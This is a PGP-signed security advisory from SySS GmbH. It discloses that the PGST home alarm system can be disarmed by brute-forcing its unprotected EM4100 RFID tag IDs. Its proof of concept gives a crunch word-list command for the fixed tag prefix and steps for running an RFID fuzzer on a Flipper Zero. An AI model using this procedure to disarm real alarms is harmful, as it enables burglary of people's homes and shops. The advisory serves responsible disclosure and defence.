-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-070 Product: PGST Security Alarm System Manufacturer: Shenzhen Pilot Guards Safety Technology Co., Ltd (PGST) Affected Version(s): 2024-08-19 (No version number) Tested Version(s): 2024-08-19 (No version number) Vulnerability Type: Improper Restriction of Excessive Authentication Attempts (CWE-307) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-10-16 Solution Date: TBA Public Disclosure: 2024-12-04 CVE Reference: Not yet assigned Author of Advisory: Sebastian Auwärter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The PGST Security Alarm System is a home alarm system. The manufacturer describes the product as follows (see [1]): "Our WiFi/GSM alarm system offers reliable and comprehensive protection for your home, garage, apartments and shops or other buildings on your property." Due to the usage of RFID transponders without any security features[5], the PGST Security Alarm System is vulnerable to brute-force attacks. An attacker without access to an RFID transponder is able to disarm the alarm system, rendering it useless. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: An RFID transponder which is based on the EM4100 chip can be used to disarm the alarm system. After being disarmed, the alarm is not set off if the various sensors detect an opened door, window, movement and so on. The tag can only store 32 bits of data (plus an 8-bit version number). 40 bits can potentially be brute-forced, although this takes a very long time. All analyzed tags started with the same three bytes, 53:00:C9, which means only two bytes are randomly assigned. These bytes can be brute-forced in a reasonable amount of time. It is possible that other RFID tags sold with the product use IDs of a different range, in which case brute-forcing would take a very long time. As no countermeasures exist, the alarm system can be disarmed without any prerequisites using an RFID emulator. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Hardware which is able to emulate RFID tags is necessary to reproduce this brute-force attack. For example, a Flipper Zero[6] with the RFID fuzzer[7] app can be utilized. Creating a word list: A word list generator like crunch[8] can be used to create a word list for the alarm system: """ crunch 10 10 ABCDEF1234567890 -s 5300C9AAAA -e 5300C99999 \ -o wordlist.txt """ The file needs to be copied to the attacker device. After selecting "Apps -> RFID -> RFID Fuzzer", select "Load UIDs from File". Time delay and emulation time can be adjusted, then the attack can be started by pressing the start button. After the correct data has been emulated, the alarm system will be disarmed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: TBA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-08-19: Vulnerability discovered 2024-10-16: Vulnerability reported to manufacturer 2024-11-08: Reminder sent to the manufacturer 2024-12-04: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Amazon link for the PGST Security Alarm System https://www.amazon.de/PGST-Komplettsystem-120-dB-Alarmsirene-Intelligenter-Fernbedienung/dp/B0CLHVRPFX/ref=sr_1_6?th=1 [2] Product website for the PGST Security Alarm System https://www.cn-pgst.com/ [3] SySS Security Advisory SYSS-2024-070 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-070.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [5] EM4100 chip description https://www.priority1design.com.au/em4100_protocol.html [6] Flipper Zero homepage https://flipperzero.one/ [7] RFID fuzzer https://github.com/DarkFlippers/Multi_Fuzzer [8] Crunch https://github.com/jim3ma/crunch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Auwärter of SySS GmbH. E-Mail: sebastian.auwaerter@syss.de LinkedIn: https://de.linkedin.com/in/sebastian-auw%C3%A4rter-156035305 Public Key: https://www.syss.de/kontakt/pgp-keys Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE+Yw+EmcTGdmeL74+6aMNSOLwqLYFAmdQRtgACgkQ6aMNSOLw qLZvhg//e6RF8OaXPjeShW8f5Pfd0jQQcCc0SYYa1XpN4xIzYzfao+OF2ntbRX2W /Byv4f1tRIizZ3G9yRtexfGlIqvhv9iTbLUlZcCOpEytoLyBHkwYExh1/MLgJne4 htgpAZ+TCPIttFwSrb0mZ1W3aytxROKTMUR/XURQMZNLyvyQX1q9DmOK/RCHFcjP SHkecygRFfz59I2T2w5qIpQodRSfdV9zFPvX/44LcY3uSvuFGq6BPG7ls9Xp+rC4 C3Ax85Y1EYeFuVXYF9R4JRLhBd0YtiarQ4b+noj8rr2VUUVBWsjx5KYR7Aybpu4+ b/PIEMudboNv6p+agGRR5wTcadXGXWfPKpUU3a24+Adh8Fi/70dvRbM39VYh8Mom G4tw6aplmVYGMsP3glqLMz6OQHcXyE3KJEGB9ekrXgrLqEAa6T6k8SRiHer4BXVs eVxYJRDR9Q4ULE7YJK2xQi9xr2qN3hRHH0dIG263+SagntO8kmopqzVPrCake+Ur VbBMLZifILeZb3McaQqG98DSTj2iB1XweOxR7rIywjjr5bPnM8Puo5H/TUNSta9g qYgSt0MUxSLjYcGYRQ7WYn07E900Mc5u24f47O7Yc4ww1/SBo7ynOyq/MseDH7x2 RSWRhXc3bt8DCh84dyYOUfMdQPo7eJtBP1xNPebRUH9E9VUtQk0= =2kEr -----END PGP SIGNATURE-----